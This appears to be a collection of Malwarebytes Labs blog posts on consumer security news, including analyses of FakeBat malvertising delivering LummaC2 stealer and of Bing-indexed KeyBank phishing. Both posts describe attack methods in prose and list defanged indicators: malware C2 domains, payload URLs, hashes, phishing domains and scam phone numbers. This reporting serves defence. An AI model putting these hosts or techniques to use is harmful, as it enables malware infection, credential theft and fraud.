IT News

A DNA testing company that promised clients insights into their genetic disposition has suddenly disappeared. The BBC reports it tried several methods to reach the company but failed in this effort.

London offices are closed, nobody answers the phone, and clients are no longer capable of accessing their online records. All the company’s social media accounts haven’t been updated since 2023 at the latest.

The atlasbiomed.com domain appears to be inactive. Customers were only able to look at their test results online, these were not downloadable, so now they are not only unable to see them, but they also have no idea what has happened to that data.

Although there is no evidence that any of the data has been misused, it is worrying to not know who now has access to the data, especially now that the investigation shows that there might be ties to Russia.

While four out of eight company officers have resigned, two of those that remain are listed at the same address in Moscow. That happens to be the same address as that of a Russian billionaire, who is described as a now resigned director.

DNA testing has become so commonplace that many people have blindly participated without truly understanding the implications. It has always been a problem to figure out who you could trust with your genetic data. For some people it’s their cheapest chance of finding out whether they are affected by some genetic disorder.

Since those early days, we’ve had several warnings about how submitting your genetic data can go sideways.

In 2018, MyHeritage suffered a security incident which exposed the email addresses and hashed passwords of 92 million users.

In 2020, Ancestry was acquired by investment firm Blackstone for $4.7 billion, which raised questions about the potential commercialization of genetic data and its transfer to new owners.

And the ongoing saga of what happened at 23andMe is the clearest example of why people would be hesitant to submit genetic data. In 2023, cybercriminals put up information belonging to as many as seven million 23andMe customers for sale on criminal forums following a credential stuffing attack against the genomics company.

Since then all board members have resigned, except for CEO Anne Wojcicki who has stood by her plans to take the company private, raising again the subject of what happens to customer genetic data when a company is sold.

Data breaches happen to the best companies. So, even if a company has good intentions, there is still a risk of your genetic data being linked to your personally identifiable information (PII). This makes the information a treasure trove for advertisers, insurance companies, and Big Pharma.

All of this makes it very understandable that customers of Atlas Biomed are worried about where their data might end up.

Words of warning

The UK regulator, the Information Commissioner’s Office (ICO) has confirmed it has received a complaint about Atlas Biomed, saying in a statement:

“People have the right to expect that organizations will handle their personal information securely and responsibly.”

Unfortunately, we know that not all organizations will meet that expectation, so there are a few things you should keep in mind.

If you submit genetic material, research the company you want to trust with it thoroughly.

Only share the personal information you absolutely have to provide with the genetic testing company. Lie if you must and create a separate free email account so the information can’t be tied to your main account.

Make sure to familiarize yourself with the company’s privacy policy and opt out of sharing information where possible. Make sure to stay informed about any policy updates or changes from the company.

As a wise lady and one of my former editors once wrote:

“Many a friend and family member have scoffed at my warnings to stay away from consumer DNA testing kits, remarking that they have nothing to hide or that there’s no harm in releasing their DNA into the hands of researchers. I honestly hope they’re right.

I hope they never have to fear having their health insurance ripped away because of pre-existing conditions or an increased risk of developing certain diseases. I hope they aren’t inundated with marketing emails about cancer-preventative nutrition or the best new medicines to prolong the onset of Alzheimer’s. I sincerely hope they’re never targeted by racial-profiling police officers, denied a job by a prejudiced employer or buried in paperwork after having their identity stolen by a hacker. And I fervently hope they’ll never have to hide their genetic profile from a government hell-bent on ridding its country of a certain ethnicity or race.”

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Last week on Malwarebytes Labs:

• Hello again, FakeBat: popular loader returns after months-long hiatus
• TikTok ordered to close Canada offices following “national security review”
• Air fryers are the latest surveillance threat you didn’t consider
• Malwarebytes acquires AzireVPN to fuel additional VPN features and functionalities
• Large eBay malvertising campaign leads to scams
• 8 security tips for small businesses
• Update your Android: Google patches two zero-day vulnerabilities
• Warning: Hackers could take over your email account by stealing cookies, even if you have MFA
• Why your vote can’t be “hacked,” with Cait Conley of CISA (Lock and Code S05E23)
• City of Columbus breach affects around half a million citizens
• Crooks bank on Microsoft’s search engine to phish customers

Last week on ThreatDown:

• How the Black Basta ransomware gang hides Cobalt Strike beacons with PowerShell

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

The web browser, and search engines in particular, continue to be a popular entry point to deliver malware to users. While we noted a decrease in loaders distributed via malvertising for the past 3 months, today’s example is a reminder that threat actors can quickly switch back to tried and tested methods.

After months of absence, Fakebat (AKA Eugenloader, PaykLoader) showed up on our radar again via a malicious Google ad for the productivity application Notion. FakeBat is a unique loader that has been used to drop follow-up payloads such as Lumma stealer.

In this blog post, we detail how criminals are targeting their victims and what final malware payload they are delivering post initial infection. The incident was found and reported to Google on the same day as this publication.

Google Ads distribution

Last time we saw FakeBat was on July 25 2024, via a malicious ad for Calendly, a popular online scheduling application. In that instance, FakeBat’s command and control infrastructure ran from utd-gochisu[.]com.

Fast forward to November 8, 2024, and we have an ad appearing at the top of a Google search for ‘notion’. That sponsored result looks entirely authentic, with an official logo and website. We already know that criminals are able to impersonate any brand of their liking by simply using a click tracker — or tracking template — in order to bypass detection.

According to Google’s Ads Transparency Center , the Notion ad was shown in the following geographic locations:

Below is the network traffic from the ad URL to the payload. We can see the use of the tracking template (smart.link), followed by a cloaking domain (solomonegbe[.]com), before landing on the decoy site (notion[.]ramchhaya.com):

Why does this work and bypasses Google? Likely because if the user is not an intended victim, the tracking template would redirect them to the legitimate notion.so website.

FakeBat drops LummaC2 stealer

After extracting the payload, we recognize the classic first stage FakeBat PowerShell:

Security researcher and long time FakeBat enthusiast RussianPanda was kind enough to give us a hand by looking at this installer in closer detail.

After some fingerprinting to avoid sandboxes, we get this second stage PowerShell:

Of note, the threat actors are still using the same old RastaMouse AMSI bypass script from April 2024:

The loader is obfuscated with .NET Reactor, where it decrypts the embedded resource with AES and then injects it into MSBuild.exe via process hollowing:

The decrypted payload is LummaC2 Stealer with user ID: 9zXsP2.

Conclusion

While malicious ads delivering malware payloads have been a little more rare for the past several weeks, today’s example shows that threat actors can and will make a comeback whenever the time is right.

Brand impersonation via Google ads remains problematic, as anyone can leverage built-in features to appear legitimate and trick users into downloading malware.

We appreciate and would like to thanks RussianPanda‘s quick analysis on the payload, as well as security researcher Sqiiblydoo for reporting the malicious certificate used to sign the installer.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Indicators of Compromise

Malvertising chain

solomonegbe[.]com
notion[.]ramchhaya.com

Malicious Notion installer

34c46b358a139f1a472b0120a95b4f21d32be5c93bc2d1a5608efb557aa0b9de

FakeBat C2

ghf-gopp1rip[.]com

1.jar (PaykRunPE)

2de8a18814cd66704edec08ae4b37e466c9986540da94cd61b2ca512d495b91a

LummaC2 (decrypted payload)

de64c6a881be736aeecbf665709baa89e92acf48c34f9071b8a29a5e53802019

JwefqUQWCg (encrypted resource)

6341d1b4858830ad691344a7b88316c49445754a98e7fd4a39a190c590e8a4db

Malicious URLs

furliumalerer[.]site/1.jar
pastebin[.]pl/view/raw/a58044c5

LummaC2 Stealer C2s:

rottieud[.]sbs
relalingj[.]sbs
repostebhu[.]sbs
thinkyyokej[.]sbs
tamedgeesy[.]sbs
explainvees[.]sbs
brownieyuz[.]sbs
slippyhost[.]cfd
ducksringjk[.]sbs

The Government of Canada ordered the TikTok Technology Canada Inc. to close its offices in the country following a national security review.

This decision was made in accordance with the Investment Canada Act, which allows for the review of foreign investments that may be injurious to Canada’s national security. Canada’s Minister of Innovation, Science and Industry stated:

“As a result of a multi-step national security review process, which involves rigorous scrutiny by Canada’s national security and intelligence community, the Government of Canada has ordered the wind up of the Canadian business carried on by TikTok Technology Canada, Inc. The government is taking action to address the specific national security risks related to ByteDance Ltd.’s operations in Canada through the establishment of TikTok Technology Canada, Inc. The decision was based on the information and evidence collected over the course of the review and on the advice of Canada’s security and intelligence community and other government partners.”

This does not mean Canadians will no longer have access to the popular social media platform. It just means the Chinese owned company will have to close its Canadian operations located in Toronto and Vancouver.

Canada says the decision whether citizens want to use the social media platform is a personal choice but it does encourage Canadians to consult the guidance issued by Communications Security Establishment Canada’s Canadian Centre for Cyber Security to help them assess these risks.

One of the key points of their guidance is the “security over convenience” guideline, which says:

“It may be convenient to have an app always know your location or be able to fetch your photos without approval, but this isn’t the most secure option. Be aware of the features and elements of your device that can be accessed by an app, and make sure you limit permissions.”

Another one that is important in this case is the “consider where your data is being stored” guideline which reminds people to think about which nation’s laws will apply to your information and your activity on the platform.

TikTok responded that:

“Shutting down TikTok’s Canadian offices and destroying hundreds of well-paying local jobs is not in anyone’s best interest, and today’s shutdown order will do just that. We will challenge this order in court.”

TikTok’s Chinese ownership has brought problems in other countries, as well. In April 2024, Malwarebytes Labs reported on how the US Senate approved a bill that would effectively ban TikTok from the country unless Chinese owner ByteDance gives up its share of the immensely popular app. That law is currently being challenged in court by the popular social media platform.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Consumer group Which? has warned shoppers to be selective when it comes to buying smart air fryers from Xiaomi, Cosori, and Aigostar.

We’ve learned to expect that “smart” appliances come with privacy risks—toothbrushes aside—but I really hadn’t given my air fryer any thought. Now things are about to change.

You don’t need to worry about the air fryers sending reports about your eating habits to your healthcare provider just yet. But according to Which?, the air fryers’ associated phone apps wanted to know customers’ precise locations, as well as permission to record audio on the user’s phone.

The researchers also found evidence that the Aigostar and Xiaomi fryers both sent people’s personal data to servers in China. This was specified in the privacy notice, but we know not everyone reads a privacy notice.

When buying any kind of smart device, it’s worth doing these things:

• Question the permissions an app asks for on your phone. Does it serve a purpose for you, the user, or is it just some vendor being nosy?
• Read the privacy policy. The vendors are counting on it that you won’t but there are times that privacy policies are very revealing.
• Ask yourself if the appliance needs to be smart. What’s in it for you, and what’s the price you’re going to pay?

An easy solution is not to install the app, and don’t provide manufacturers with personal data they do not need to know. They may need your name for the warranty, but your gender, age, and—most of the time—your address isn’t needed.

You shouldn’t be surprised to find out that appliances that are activated by voice commands are listening to you. How else do you expect them to know you are giving them an order?

It’s what they do with the information and how well they are secured against abuse by third parties that we should be concerned with.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Today I have great news to share: We’ve acquired AzireVPN, a privacy-focused VPN provider based in Sweden. 

I wanted to share with you our intentions behind this exciting step, and what this means for our existing users and the family of solutions they rely on to keep them private and secure. 

Malwarebytes has long been an advocate for user privacy (think Malwarebytes Privacy VPN and our free web extension Malwarebytes Browser Guard). Now, we’re leaning even more on our mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet.  

With AzireVPN’s infrastructure and intellectual property, Malwarebytes is poised to develop more advanced VPN technologies and features, offering increased flexibility and enhanced security for our users. 

Why AzireVPN? 

AzireVPN is renowned for its robust security standards and privacy-first commitment. Here are two examples of what the company does to support that: 

• AzireVPN physically owns and controls all of its dedicated and diskless servers—a practice Malwarebytes is committed to continuing.  

• The company developed Blind Operator, a unique privacy feature implemented to completely disable both remote and local access to its servers. This creates a barrier against unauthorized modifications and traffic interception, making it virtually impossible for anyone to modify or tap the traffic on its servers and share any information about a user.  

What does this mean for existing Malwarebytes Privacy VPN customers? 

There are no changes for Malwarebytes Privacy VPN customers at this time. They will continue to enjoy our streamlined, integrated user experience, and our no-log service will never track, store, or share any user network data.  

What does this mean for existing AzireVPN customers? 

AzireVPN customers will also continue to enjoy the same privacy-focused VPN service – no logs, no data collection, no bandwidth limitations. There will continue to be no requirement to share any information to sign up for the service.   

An exciting future is ahead of us 

We’ll share more details on our future VPN offering in the coming months.  

I’m so excited about our future. This is yet another milestone for Malwarebytes, underscoring our commitment to privacy and a free and open internet.  

Thanks for putting your trust in us to protect you. 

Tech support scammers are targeting eBay customers in the U.S. via fraudulent Google ads. In a few separate searches, we were able to identify multiple Sponsored results that were created from at least four different advertiser accounts.

While most of those ads clearly looked fake, they appeared consistently and prominently enough to trick the inattentive user into a scam. Victims who clicked the ad were redirected to bogus websites prompting them to call for assistance, leading them straight into the scammer’s den.

We have reported the malicious ads to Google and are monitoring for similar campaigns targeting other brands.

Flurry of ads

A search for ‘ebay phone number‘ or ‘ebay customer service‘ from the U.S. using Google Chrome returned several ads that were entirely fraudulent. Upon closer inspection, we found that they were created from four separate advertiser accounts, some belonging to legitimate entities, some created from scratch.

The first ad shown in the screenshot above is the most deceiving of all since it uses eBay’s brand name, logo and website. While Google has strict rules about who may be allowed to do this (i.e. the owner, affiliates), scammers are able to still “comply” with the rule and yet be total crooks.

All they need to do is ensure the final URL (once you click the ad) is one the same domain or is a subdomain that matches the one shown in the ad. That’s the case here, as they are using developer.ebay.com. (part of eBay’s Developers Program Search) which can technically be claimed as belonging to ebay.com.

Yet, as you can see below, the destination URL is not what one would expect. It shows a search portal with a printed search result that has eBay’s customer service phone number (narrator: it is not).

This is a trick we’ve seen recently with various online platforms: you perform a calculated search query, even if you know no result will be found. What matters is that your search query will appear on screen, and will be used to fool people who see it. In the example above, the search query was for “eBay.Customer-Service +1 (866) 409[-]9281“.

The other ads redirect to fake websites or pages hosted on cloud providers such as BitBucket claiming to be eBay customer service. Once again, scammers make it clear and obvious that users should call the phone number displayed on screen.

Keeping scammers at bay

Calling any of those phone numbers is strongly discouraged, unless of course your favorite sport is scam baiting. The tried and tested “tech support scam” is one of the most costly type of crime for American consumers.

From call centres mostly located overseas, young people with a broken English accent will attempt to trick victims into giving them access to their computer or phone. The end goal is to steal as much money as they can, by requesting gift cards or by taking over people’s own bank accounts.

It is important to always double check before calling any phone number, especially if it came from an ad or an unsolicited email. In doubt, always visit the source, i.e. ebay.com to access support via live chat or get their official number.

If you weren’t already, you may want to consider using a browser extension such as Malwarebytes Browser Guard. Not only does it block ads, it also detects phishing sites of various kinds.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Indicators of Compromise

Fake pages

e-bays-24x7support-number[.]vercel[.]app
developer[.]ebay[.]com
e-bay24x7pluscaresupport[.]bitbucket[.]io
upbay[.]online
e-bay24x7customer[.]casterins[.]online
e-bay24x7-customers-services-assist[.]onrender[.]com

Fraudulent phone numbers

1[-]866[-]409[-]9281
1[-]833[-]714[-]3970
1[-]805[-]372[-]1369

The Federal Bureau of Investigation (FBI) has issued a warning that cybercriminals are taking over email accounts via stolen session cookies, allowing them to bypass the multi-factor authentication (MFA) a user has set up.

Here’s how it works.

Most of us don’t think twice about checking the “Remember me” box when we log in. When you log in and the server has verified your authentication—straight away or after using MFA–the server creates a session and generates a unique session ID. This session ID is stored in a session cookie (or a “Remember-Me cookie” as the FBI calls it) on your browser, which is typically valid for 30 days.

Every time you return to that website within the time frame, you don’t need to log in. That’s really convenient… unless someone manages to steal that cookie from your system.

If someone steals the session cookie, they can log in as you—even if you have MFA enabled.

This is particularly relevant for email handlers that have an online—webmail—component. This includes major players like Gmail, Outlook, Yahoo, and AOL.

With access to your email account, a cybercriminal can find a lot of useful information about you, such as where you bank, your account numbers, your favorite shops, and more. This information could then be used for targeted cyberattacks that mention information that’s relevant to you only, leaving you more likely to fall for them.

Cybercriminals could use your account to spread spam and phishing emails to your contacts. And perhaps most worrying of all, once an attacker is in your email account they can reset your passwords to your other accounts and login as you there too.

How do these criminals get their hands on your session cookies? There are several ways.

On very rare occasions, session cookies can be stolen by you visiting a malicious website, or via a Machine-in-the-Middle (MitM) attack where a cybercriminal can intercept traffic and steal cookies if they’re not protected by HTTPS on an unsecured network.

However, session cookies are usually stolen by malware on the your device. Modern information-stealing malware is capable of, and even focuses on, stealing session cookies as part of its activity.  

How to keep your email account safe

There are a few things you can do to stay safe from the cookie thieves:

• Use security software on every device you use.
• Keep your devices and the software on them up to date, so there aren’t any known vulnerabilities on them.
• Decide whether you think it’s worth using the Remember me option. Is convenience worth the risk in this situation?
• Delete cookies, or—even better—log out when you are done. That should also remove or invalidate the session ID from the server, so nobody can use it to log in, even if they have the session cookie.
• Only visit sites with a secure connection (HTTPS) to protect your data from being intercepted during transmission.
• For important accounts regularly check the log in history where you can see which devices logged in when and from where. You should be able to find this option in your account settings.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This week on the Lock and Code podcast…

The US presidential election is upon the American public, and with it come fears of “election interference.”

But “election interference” is a broad term. It can mean the now-regular and expected foreign disinformation campaigns that are launched to sow political discord or to erode trust in American democracy. It can include domestic campaigns to disenfranchise voters in battleground states. And it can include the upsetting and increasing threats made to election officials and volunteers across the country.

But there’s an even broader category of election interference that is of particular interest to this podcast, and that’s cybersecurity.

Elections in the United States rely on a dizzying number of technologies. There are the voting machines themselves, there are electronic pollbooks that check voters in, there are optical scanners that tabulate the votes that the American public actually make when filling in an oval bubble with pen, or connecting an arrow with a solid line. And none of that is to mention the infrastructure that campaigns rely on every day to get information out—across websites, through emails, in text messages, and more.

That interlocking complexity is only multiplied when you remember that each, individual state has its own way of complying with the Federal government’s rules and standards for running an election. As Cait Conley, Senior Advisor to the Director of the US Cybersecurity and Infrastructure Security Agency (CISA) explains in today’s episode:

“There’s a common saying in the election space: If you’ve seen one state’s election, you’ve seen one state’s election.”

How, then, are elections secured in the United States, and what threats does CISA defend against?

Today, on the Lock and Code podcast with host David Ruiz, we speak with Conley about how CISA prepares and trains election officials and volunteers before the big day, whether or not an American’s vote can be “hacked,” and what the country is facing in the final days before an election, particularly from foreign adversaries that want to destabilize American trust.

 ”There’s a pretty good chance that you’re going to see Russia, Iran, or China try to claim that a distributed denial of service attack or a ransomware attack against a county is somehow going to impact the security or integrity of your vote. And it’s not true.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

We identified a new wave of phishing for banking credentials that targets consumers via Microsoft’s search engine. A Bing search query for ‘Keybank login’ currently returns malicious links on the first page, and sometimes as the top search result. We have reported the fraudulent sites to Microsoft already.

While Microsoft’s Bing only has about 4% of the search engine market share, crooks are drawn to it as an alternative to Google. One particularly interesting detail is how a phishing website created barely two weeks ago is already indexed and displayed before the official one.

In this blog post, we take a look at how criminals are abusing Bing and stay under the radar at the same time while also bypassing advanced security features such as two-factor authentication.

Bing search engine poisoning

We first noticed a phishing campaign coming from Bing’s search engine and targeting Keybank customers on November 29. A malicious link is displayed as the first result and pretends to be Keybank’s login page.

The domain name used is ixx-kexxx[.]com which was registered on November 15. Given that it is only two weeks old and yet came up before ibx.key.com (the real website), we surmise that the attackers are abusing Bing’s search algorithms.

Indexing and cloaking in one go

Upon clicking on the link, users are redirected to a friendly and helpful website before getting redirected again to the actual phishing page. However, we need to pause right here in order to see a couple of “blackhat” techniques.

That first page is only meant for crawlers and scanners (and users who aren’t of interest) which will both scrape the content and index it, as well as see that the page is clean. This technique is fairly common, and we actually see similar examples with ad fraud. The idea is about creating content that looks real, like a blog, but with malicious intent (monetization or other).

Actual victims do not get to see that page because they are immediately redirected to another website, this time completely malicious. The redirect happens server-side based on user attributes such as their browser profile, IP address and others.

That page uses the official branding and is a login portal for KeyBank. Once a victim types their user ID and password, criminals will receive the data immediately. Note that the phishing site is using https, which means strictly nothing here (the information will be encrypted while in transit but received in clear text by the recipient).

Bypassing multi factor authentication

In some phishing campaigns, criminals are notified in real time when a new victim attempts to login into their fraudulent page. One thing we noticed on the phishing page after the first screen, was a message claiming that the internet connection was poor. This is a disguise for what’s happening behind the scenes:

It’s often necessary for criminals to get past a few hurdles first. They need to login from the same location as the victim (their fake site gives them the IP address and they can use a proxy) and they may need to get through multi-factor authentication. Sometimes, the easiest thing to do is simply to ask for it.

Multi-factor authentication is still highly recommended, but users should be aware that criminals can directly ask for verification codes while pretending to be the real bank. We should also note that SMS verification is one of the weakest methods for two-factor authentication.

Security questions (usually 3 of them) are also used to either reset a password or for some other verification purpose (maybe a login from a new browser or location). This phishing kit also asks the victims to enter that information:

Conclusion

Phishing is one of the biggest threats consumers face every day. Malicious links can be sent to them via email, text message, social media or they may simply come across them via a search engine.

In this particular example, Bing was tricked into indexing a website that looked legitimate but turned out to be a gateway to a phishing portal. As the domain name was unknown to Microsoft at the time, it failed to protect users.

We highly recommend anyone to adopt more phishing-proof ways to login into important websites. Passkeys come to mind immediately since they do not involve passwords at all. In other words, if you don’t need to type a password… there’s no password to steal.

Unfortunately, not all websites offer the latest technologies to protect their customers. While it is important to add a second factor for authentication, you may want to upgrade to an Authenticator app, instead of the less trustworthy SMS verification. Perhaps the most important thing to remember is that criminals can also try to request those one-time codes from you and you should always be extremely vigilant before entering them in any online website (or replying to an unknown text).

Malwarebytes Browser Guard already protected users from this phishing campaign without having seen the malicious websites before. This is because of the built-in anti-phishing heuristic rules which intercept the connection and display a warning message:

If you suspect your banking information has already been stolen, try to take action as quickly as possible by contacting your financial institution(s) and resetting all your passwords (especially if you reused any of them for different websites).

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Indicators of Compromise

Cloaking domains

ixx-kexxx[.]com

Phishing domains

xxx-ii-news[.]net
xxx-ii-news[.]com
ixxx-blognew[.]com
xxx-ii-news[.]net
new-bllog-i[.]com
info-blog-news[.]com
xv-bloging-info[.]com
xxx-new-videos[.]com

Hosting server

200.107.207[.]232